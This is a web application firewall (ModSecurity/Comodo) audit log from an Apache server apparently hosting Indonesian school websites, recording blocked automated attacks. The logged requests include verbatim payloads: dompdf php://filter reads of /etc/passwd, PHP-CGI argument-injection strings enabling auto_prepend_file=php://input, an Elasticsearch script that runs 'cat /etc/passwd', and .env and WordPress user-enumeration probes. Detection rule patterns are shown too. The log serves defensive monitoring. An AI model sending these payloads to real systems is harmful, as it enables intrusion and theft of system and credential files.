X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --daddb327-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daddb327-E-- --daddb327-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748689357458306 3061 (- - -) Stopwatch2: 1748689357458306 3061; combined=786, p1=504, p2=243, p3=0, p4=0, p5=39, sr=94, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daddb327-Z-- --e34ce055-A-- [31/May/2025:18:02:37 +0700] aDrhzVbZTRMbIzLSWp7hGwAAAMc 103.236.140.4 46662 103.236.140.4 8181 --e34ce055-B-- GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15 Accept: */* Accept-Language: en --e34ce055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e34ce055-E-- --e34ce055-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357459492 2048 (- - -) Stopwatch2: 1748689357459492 2048; combined=541, p1=371, p2=126, p3=0, p4=0, p5=44, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e34ce055-Z-- --6a4dd05e-A-- [31/May/2025:18:02:37 +0700] aDrhzeg1nD2n5twq7NuQpAAAAEU 103.236.140.4 46660 103.236.140.4 8181 --6a4dd05e-B-- GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en --6a4dd05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a4dd05e-E-- --6a4dd05e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357459358 2354 (- - -) Stopwatch2: 1748689357459358 2354; combined=622, p1=388, p2=196, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a4dd05e-Z-- --f420a070-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o5wAAAAM 103.236.140.4 46646 103.236.140.4 8181 --f420a070-B-- POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 34 User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded --f420a070-C-- --f420a070-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f420a070-E-- --f420a070-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748689357454951 6961 (- - -) Stopwatch2: 1748689357454951 6961; combined=5049, p1=557, p2=4461, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f420a070-Z-- --3b4e7840-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8WwAAAIc 103.236.140.4 46664 103.236.140.4 8181 --3b4e7840-B-- GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/122.0 Safari/537.36 Accept: */* Accept-Language: en --3b4e7840-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b4e7840-E-- --3b4e7840-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357459637 2395 (- - -) Stopwatch2: 1748689357459637 2395; combined=730, p1=552, p2=140, p3=0, p4=0, p5=37, sr=173, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b4e7840-Z-- --2f1c517a-A-- [31/May/2025:18:02:37 +0700] aDrhzeg1nD2n5twq7NuQpQAAAFc 103.236.140.4 46668 103.236.140.4 8181 --2f1c517a-B-- GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1 Accept: */* Accept-Language: en --2f1c517a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f1c517a-E-- --2f1c517a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460203 1972 (- - -) Stopwatch2: 1748689357460203 1972; combined=625, p1=472, p2=127, p3=0, p4=0, p5=26, sr=91, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f1c517a-Z-- --e2cba129-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6QAAABI 103.236.140.4 46658 103.236.140.4 8181 --e2cba129-B-- GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: */* Accept-Language: en --e2cba129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2cba129-E-- --e2cba129-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460203 2117 (- - -) Stopwatch2: 1748689357460203 2117; combined=595, p1=468, p2=100, p3=0, p4=0, p5=27, sr=86, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2cba129-Z-- --bfc9da26-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8XAAAAJA 103.236.140.4 46670 103.236.140.4 8181 --bfc9da26-B-- GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept: */* Accept-Language: en --bfc9da26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfc9da26-E-- --bfc9da26-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460555 1901 (- - -) Stopwatch2: 1748689357460555 1901; combined=520, p1=414, p2=85, p3=0, p4=0, p5=21, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfc9da26-Z-- --75818876-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6gAAABA 103.236.140.4 46666 103.236.140.4 8181 --75818876-B-- POST /_search?pretty HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 369 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded --75818876-C-- { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } --75818876-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75818876-E-- --75818876-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search?pretty"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460609 2040 (- - -) Stopwatch2: 1748689357460609 2040; combined=612, p1=280, p2=309, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75818876-Z-- --62d6cc53-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6wAAAA4 103.236.140.4 46672 103.236.140.4 8181 --62d6cc53-B-- GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: WMS/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Accept: */* Accept-Language: en --62d6cc53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62d6cc53-E-- --62d6cc53-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460920 1934 (- - -) Stopwatch2: 1748689357460920 1934; combined=501, p1=395, p2=82, p3=0, p4=0, p5=24, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62d6cc53-Z-- --b3a37873-A-- [31/May/2025:18:39:11 +0700] aDrqX53Kgs4r2wz12c71fgAAAAw 103.236.140.4 36566 103.236.140.4 8181 --b3a37873-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b3a37873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3a37873-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748691551924345 851 (- - -) Stopwatch2: 1748691551924345 851; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3a37873-Z-- --63b0b97f-A-- [31/May/2025:18:41:10 +0700] aDrq1h_L2Rte6DjSjWaInAAAAJQ 103.236.140.4 38716 103.236.140.4 8181 --63b0b97f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.18.232.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --63b0b97f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63b0b97f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748691670073382 2897 (- - -) Stopwatch2: 1748691670073382 2897; combined=1333, p1=407, p2=880, p3=0, p4=0, p5=45, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63b0b97f-Z-- --c516541f-A-- [31/May/2025:19:19:54 +0700] aDrz6lbZTRMbIzLSWp72ogAAAMw 103.236.140.4 58804 103.236.140.4 8181 --c516541f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c516541f-C-- --c516541f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c516541f-E-- --c516541f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748693994596933 4048 (- - -) Stopwatch2: 1748693994596933 4048; combined=2560, p1=469, p2=2058, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c516541f-Z-- --a188f84f-A-- [31/May/2025:19:32:27 +0700] aDr22-g1nD2n5twq7NuqEAAAAEI 103.236.140.4 45934 103.236.140.4 8181 --a188f84f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.138.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.138.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a188f84f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a188f84f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748694747010002 2743 (- - -) Stopwatch2: 1748694747010002 2743; combined=1250, p1=427, p2=794, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a188f84f-Z-- --88db383b-A-- [31/May/2025:20:05:38 +0700] aDr-oh_L2Rte6DjSjWah0QAAAJQ 103.236.140.4 58876 103.236.140.4 8181 --88db383b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --88db383b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88db383b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748696738422462 854 (- - -) Stopwatch2: 1748696738422462 854; combined=400, p1=357, p2=0, p3=0, p4=0, p5=43, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88db383b-Z-- --0a73f913-A-- [31/May/2025:20:33:37 +0700] aDsFMVbZTRMbIzLSWp4OfAAAAMo 103.236.140.4 59762 103.236.140.4 8181 --0a73f913-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.171.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.171.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0a73f913-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a73f913-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748698417169468 745 (- - -) Stopwatch2: 1748698417169468 745; combined=307, p1=267, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips 